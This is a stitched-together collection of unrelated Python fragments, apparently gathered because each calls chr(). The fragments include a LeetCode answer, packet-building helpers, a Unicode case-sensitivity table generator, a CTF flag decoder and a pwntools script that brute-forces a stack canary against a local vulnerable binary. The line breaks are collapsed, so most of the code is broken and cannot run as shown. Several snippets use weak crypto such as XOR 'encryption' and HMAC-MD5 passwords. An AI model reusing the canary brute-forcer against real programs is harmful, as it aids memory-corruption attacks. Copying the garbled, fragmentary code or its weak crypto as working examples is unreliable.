def findTheDifference(self, s: str, t: str) -> str: return chr(sum(map(ord, t))-sum(map(ord, s)))
def append_charval(self, char_number): self.chars.append( chr(char_number).encode('ISO-8859-1') )
def _Reserved(self, num_used): assert(num_used >= 3 and num_used < self.length_packet - 1) return chr(0)*(self.length_packet - num_used - 1)
octdigits -- a string containing all characters considered octal digits """ # Some strings for ctype-style character classification whitespace = ' \t\n\r\v\f' lowercase = 'abcdefghijklmnopqrstuvwxyz' uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' letters = lowercase + uppercase digits = '0123456789' hexdigits = digits + 'abcdef' + 'ABCDEF' octdigits = '01234567' # Case conversion helpers _idmap = '' for i in range(256): _idmap = _idmap + chr(i) del i # Backward compatible names for exceptions index_error = ValueError atoi_error = ValueError atof_error = ValueError atol_error = ValueError # convert UPPER CASE letters to lower case def lower(s): """lower(s) -> string Return a copy of the string s converted to lowercase. """
def __init__(self, username, password): self.username = username self.key = "".join([chr(random.randint(48, 122)) for i in range(20)]) self.password = hmac_md5(self.key, password)
def _StartCommand(self, byte): return chr(0xaa) + chr(self.address) + chr(byte)
def xor_encrypt(str, key): full_key = b'' while(len(full_key) < len(str)): full_key += key l = [chr(a ^ b) for a, b in zip(str, full_key)] return ''.join(l).encode('latin')
def pad(text, blocksize): n = blocksize - len(text) % blocksize for i in range(0, n): text += chr(n).encode(); return text
def unicode_to_str(self, content): data = "" for i in content: data += chr(ord(i)) return data
def jbytes_to_str(jbytes): r = "" for char in jbytes: r += chr(char & 255) return r
a = input()# 문장 받음 b=[] for x in range(32): b.append(0) for x in a:# 문장의 길이만큼 반복 i=65 for y in range(32): if (ord(x)== i) or (ord(x)==i+32):#대문자든 소문자든 b[i-65]+=1 break else: i+=1 maxi = max(b) count1 = b.count(maxi) if count1 >1: print('?') elif count1==1: mini= chr(65+b.index(max(b))) print(mini)
@classmethod def read_squad_examples(cls, path, set_type): return squad_style_template.generic_read_squad_examples( path=path, set_type=set_type, example_class=cls.Example, ) # === Evaluation === # # MLQA has a slightly different evaluation / detokenization for different languages. # Can de-dup this later if necessary. PUNCT = { chr(i) for i in range(sys.maxunicode) if unicodedata.category(chr(i)).startswith("P") }.union(string.punctuation) WHITESPACE_LANGS = ["en", "es", "hi", "vi", "de", "ar"] MIXED_SEGMENTATION_LANGS = ["zh"] def whitespace_tokenize(text): return text.split() def mixed_segmentation(text): segs_out = [] temp_str = "" for char in text:
def clean(text): text = re.sub('&.*?;', '', text) if(platform.system() == 'Windows'): stopwords = set(re.split(r'[\s]', re.sub('[\W]', '', open('resources/stopwords.txt', 'r', encoding='utf8').read().lower(), re.M), flags=re.M) + [chr(i) for i in range(ord('a'), ord('z') + 1)]) else: stopwords = set(re.split(r'[\s]', re.sub('[\W]', '', open('resources/stopwords.txt', 'r').read().lower(), re.M), flags=re.M) + [chr(i) for i in range(ord('a'), ord('z') + 1)]) stopwords.update(['"', "'", ':', ';', '(', ')', '[', ']', '{', '}']) tokens = [word.lower() for word in text.split() if word.lower() not in stopwords] return ' '.join([i for i in [j for j in tokens if re.match('[a-z]', j)]])
def string(zahl): if zahl <= 9: return str(zahl) else: return chr(55+zahl)
def get_next_byte(self): char = [] for i in range(8): # char <<= 1 # char |= self.get_next_bit() char.insert(0, str(self.get_next_bit())) char = int("".join(char), 2) # Reverse # char = int(bin(char)[:1:-1], 2) # self.get_next_bit() return char reader = ImageReader(base_image) text_length = reader.read_text_length() print("Text length: {}".format(text_length)) text_bytes = [] for b in range(text_length): text_bytes.append(reader.get_next_byte()) for b in text_bytes: print(chr(b), end="") print() print("bits read: {}".format(reader.bits_read))
#hex+hex=hex # 1+1=window l1 = [ 0x23, 0x49, 0x16, 0x46, 0x45, 0x16, 0x3c, 0x3c, 0x45, 0x64, 0x16, 0x37, 0x3c, 0x3c, 0x3c, 0x16, 0x46, 0x45, 0x37, 0x1e, 0x49, 0x16, 0x46, 0x49, 0x16, 0x1e, 0x16, 0x32, 0x32, 0x3c, 0x32, 0x49, 0x3c, 0x64, 0x1e, 0x32, 0x3c, 0x18, 0x64, 0x32, 0x32, 0x50, 0x14, 0x64, 0x32, 0x5a, 0x45, 0x32, 0x32, 0x55, 0x50, 0x49, 0x3c, 0x14, 0x3c, 0x5f ] l2 = [ 0x26, 0x2b, 0x0a, 0x23, 0x2e, 0x0a, 0x29, 0x25, 0x2e, 0x15, 0x0a, 0x37, 0x25, 0x25, 0x2c, 0x0a, 0x23, 0x2e, 0x37, 0x09, 0x2b, 0x0a, 0x23, 0x2b, 0x0a, 0x21, 0x0a, 0x30, 0x31, 0x25, 0x31, 0x2b, 0x2a, 0x17, 0x13, 0x2d, 0x2c, 0x18, 0x0c, 0x01, 0x2d, 0x29, 0x1c, 0x11, 0x2d, 0x1b, 0x2e, 0x01, 0x2d, 0x1b, 0x29, 0x2b, 0x2c, 0x1c, 0x32, 0x1e ] flag = [] # flag2 = [] for i in l1: for j in l2: # print(i,j) flag.append(chr(i + j)) l2.pop(0) break print(''.join(flag))
from pwn import * canary='' for i in range (0,4): for j in range(0,256): io= process('./vuln') padding = 'A'*32 try : input_string = padding + canary + chr(j) io.sendline(str(len(input_string))) io.recvuntil('Input> ') io.sendline(input_string) response = io.recvline() if 'Ok..' in response : canary+=chr(j) break except: pass io.close() print("CANARY FOUND : " + canary)
def print_outputs(outputs: List[int]): out = "".join(chr(n) for n in outputs) print(out)
def __call__(self): import msvcrt return chr(msvcrt.getch()[0])
best_val = grid[r][c] best_pos = (r, c) return best_pos def do_flow(grid, ans, r, c, v): if ans[r][c] is not None: return ans[r][c] R, C = flow_to(grid, r, c) if R == r and C == c: ans[r][c] = v else: ans[r][c] = do_flow(grid, ans, R, C, v) return ans[r][c] for t in range(T): H, W = map(int, readline().split()) grid = [] ans = [] for r in range(H): ans.append([None] * W) grid.append(map(int, readline().split())) print "Case #%d:" % (t + 1) v = 0 for r in range(H): for c in range(W): v = max(do_flow(grid, ans, r, c, v) + 1, v) print ' '.join(chr(i + ord('a')) for i in ans[r])
def updateCaseSensitivityBlock(filename, test=False): def getBitCount(value): return len(bin(value)) - 2 caseTable = ['0']*UnicodeCharacterCount maskTable = [0] * (UnicodeCharacterCount >> 5) first = 0x600 maxCh = 0 for ch in range(UnicodeCharacterCount): if isCaseSensitive(chr(ch)): maxCh = ch caseTable[ch] = '1' maskTable[ch >> 5] |= (1 << (ch & 31)) # divide characters into blocks, filter out blocks with all character not case sensitive. blockSizeBit = 2 blockSize = 1 << blockSizeBit firstCount = first >> 5 maskCount = 1 + (maxCh >> 5) maskCount = blockSize * ((maskCount + blockSize - 1) // blockSize) maskList = maskTable[:firstCount] blockIndexValueBit = 7 blockIndexCount = 1 << blockIndexValueBit blockList = [] blockData = [(0, 0)] * blockIndexCount blockIndex = [0] * blockIndexCount maxBlockId = (maskCount // blockSize - 1) >> blockIndexValueBit blockBitCount = getBitCount(maxBlockId) indexBitCount = 8 - blockBitCount maxIndex = 1 << indexBitCount overlapped = False for i in range(firstCount, maskCount, blockSize): block = tuple(maskTable[i:i+blockSize]) if sum(block) == 0: continue try: index = blockList.index(block) except ValueError: index = len(blockList) blockList.append(block) index += 1 blockId = i // blockSize blockSlot = blockId & (blockIndexCount - 1) if blockData[blockSlot][1]: print('multi block', blockId, blockSlot, blockData[blockSlot], index) if index > maxIndex: overlapped = True print('overlapped block', blockId, blockSlot, index) blockId = blockId >> blockIndexValueBit blockData[blockSlot] = (blockId, index) blockIndex[blockSlot] = index | (blockId << indexBitCount) #lines = [] #for i in range(0, len(blockData), 8): # line = ', '.join('(%d,%2d)' % item for item in blockData[i:i+8]) # lines.append(line) #print('\n'.join(lines)) if overlapped: return indexTable = [] for block in blockList: for mask in block: try: index = maskList.index(mask) except ValueError: index = len(maskList) maskList.append(mask) indexTable.append(index) size = len(blockIndex) + len(indexTable) + len(maskList)*4 print('caseBlock', blockSize, len(maskList), len(blockIndex), len(indexTable), size) output = ["// Created with Python %s, Unicode %s" % ( platform.python_version(), unicodedata.unidata_version)] output.append('#define kUnicodeCaseSensitiveFirst\t0x%04xU' % first) output.append('#define kUnicodeCaseSensitiveMax\t0x%04xU' % maxCh) output.append('') output.append('static const uint8_t UnicodeCaseSensitivityIndex[] = {') output.append('// block index') for i in range(0, len(blockIndex), 32): line = ', '.join(map(str, blockIndex[i:i+32])) output.append(line + ',') output.append('// mask index') for i in range(0, len(indexTable), 32): line = ', '.join(map(str, indexTable[i:i+32])) output.append(line + ',') output.append('};') output.append('') output.append('static const uint32_t UnicodeCaseSensitivityMask[] = {') for i in range(0, len(maskList), 8): line = ', '.join('0x%08xU' % mask for mask in maskList[i:i+8]) output.append(line + ',') output.append('};') indexMask = (1 << indexBitCount) - 1 indexOffset = blockIndexCount - blockSize # the condition is: index != 0 && (index >> indexBitCount) == (block >> blockIndexValueBit) # => index != 0 && ((index >> indexBitCount) ^ (block >> blockIndexValueBit)) == 0 # set block = index ^ (block >> (blockIndexValueBit - indexBitCount) # => index != 0 && (block >> indexBitCount) == 0 # => index != 0 && block < indexMask + 1 # set diff = block - (indexMask + 1), with 2's complement, when diff >= 0, diff >> 8 is zero; # when diff < 0, diff >> 8 has 24-bit (or 32-bit using arithmetic shift right) 1s on the right. function = f""" // case sensitivity for ch in [kUnicodeCaseSensitiveFirst, kUnicodeCaseSensitiveMax] static inline int IsCharacterCaseSensitiveSecond(uint32_t ch) {{ uint32_t block = ch >> {blockSizeBit + 5}; uint32_t index = UnicodeCaseSensitivityIndex[block & {hex(blockIndexCount - 1)}]; block = index ^ (block >> {blockIndexValueBit - indexBitCount}); index &= ((block - {hex(indexMask + 1)}) >> 8) & {hex(indexMask)}; if (index) {{ ch = ch & {hex(blockSize*32 - 1)}; index = {indexOffset} + (index << {blockSizeBit}); index = UnicodeCaseSensitivityIndex[index + (ch >> 5)]; return bittest(UnicodeCaseSensitivityMask + index, ch & 31); }} return 0; }} """ output.extend(function.splitlines()) if not test: Regenerate(filename, "//case", output) return with open(filename, 'w', encoding='utf-8') as fd: fd.write(r"""#include <cstdint> #include "../include/VectorISA.h" """) fd.write('\n'.join(output)) fd.write(r""" int IsCharacterCaseSensitive(uint32_t ch) { if (ch < kUnicodeCaseSensitiveFirst) { return bittest(UnicodeCaseSensitivityMask + (ch >> 5), ch & 31); } if (ch > kUnicodeCaseSensitiveMax) { return 0; } return IsCharacterCaseSensitiveSecond(ch); } """) addCaseSensitivityTest(fd, caseTable, maskCount*32)
def genrate_session_token(lenght=10): return ''.join(random.SystemRandom().choice([chr(i) for i in range(97, 123)] + [str(i) for i in range(10)]) for _ in range(lenght))
def updateCaseSensitivity(filename, test=False): caseTable = ['0']*UnicodeCharacterCount maskTable = [0] * (UnicodeCharacterCount >> 5) first = 0x600 maxCh = 0 for ch in range(UnicodeCharacterCount): if isCaseSensitive(chr(ch)): maxCh = ch caseTable[ch] = '1' maskTable[ch >> 5] |= (1 << (ch & 31)) maskCount = 1 + (maxCh >> 5) maskList = maskTable[:(first >> 5)] maskTable = maskTable[len(maskList):maskCount] indexTable = [] for mask in maskTable: try: index = maskList.index(mask) except ValueError: index = len(maskList) maskList.append(mask) indexTable.append(index) print('Unicode Case Sensitivity maskList:', len(maskList), 'indexTable:', len(indexTable), maskCount, maxCh) args = { 'table': 'UnicodeCaseSensitivityIndex', 'with_function': False, } table, function = compressIndexTable('Unicode Case Sensitivity', indexTable, args) table = 'static ' + table output = ["// Created with Python %s, Unicode %s" % ( platform.python_version(), unicodedata.unidata_version)] output.append('#define kUnicodeCaseSensitiveFirst\t0x%04xU' % first) output.append('#define kUnicodeCaseSensitiveMax\t0x%04xU' % maxCh) output.append('') output.extend(table.splitlines()) output.append('') output.append('static const uint32_t UnicodeCaseSensitivityMask[] = {') for i in range(0, len(maskList), 8): line = ', '.join('0x%08xU' % mask for mask in maskList[i:i+8]) output.append(line + ',') output.append('};') function = """ // case sensitivity for ch in [kUnicodeCaseSensitiveFirst, kUnicodeCaseSensitiveMax] static inline int IsCharacterCaseSensitiveSecond(uint32_t ch) {{ const uint32_t lower = ch & 31; ch = (ch - kUnicodeCaseSensitiveFirst) >> 5; ch = ({table}[ch >> {shiftA}] << {shiftA2}) | (ch & {maskA}); ch = ({table}[{offsetC} + (ch >> {shiftC})] << {shiftC2}) | (ch & {maskC}); ch = {table}[{offsetD} + ch]; return bittest(UnicodeCaseSensitivityMask + ch, lower); }} """.format(**args) output.extend(function.splitlines()) if not test: Regenerate(filename, "//case", output) return with open(filename, 'w', encoding='utf-8') as fd: fd.write(r"""#include <cstdint> #include "../include/VectorISA.h" """) fd.write('\n'.join(output)) fd.write(r""" int IsCharacterCaseSensitive(uint32_t ch) { if (ch < kUnicodeCaseSensitiveFirst) { return bittest(UnicodeCaseSensitivityMask + (ch >> 5), ch & 31); } if (ch > kUnicodeCaseSensitiveMax) { return 0; } return IsCharacterCaseSensitiveSecond(ch); } """) addCaseSensitivityTest(fd, caseTable, maskCount*32)
class BLOCK_MARKER: NOP = chr(0x00) READ = chr(0x01) WRITE = chr(0x02) END = chr(0xFF)